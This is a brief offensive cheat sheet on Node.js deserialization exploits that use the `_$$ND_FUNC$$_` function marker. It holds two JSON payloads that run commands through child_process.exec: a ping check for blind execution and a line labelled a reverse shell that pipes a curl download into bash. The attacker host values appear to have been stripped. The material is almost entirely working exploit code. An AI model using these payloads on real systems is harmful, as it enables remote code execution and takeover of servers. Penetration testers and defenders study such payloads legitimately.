# De/Serialization * `_$$ND_FUNC$$_function (){}` is executed after parsing ## Example Payloads * Encode, send and wait with `sudo tcpdump -i icmp` ```js {"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 ', function(error, stdout, stderr) { console.log(stdout) });\n }()"} ``` * reverse shell via ```js {"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl :8000 | bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"} ```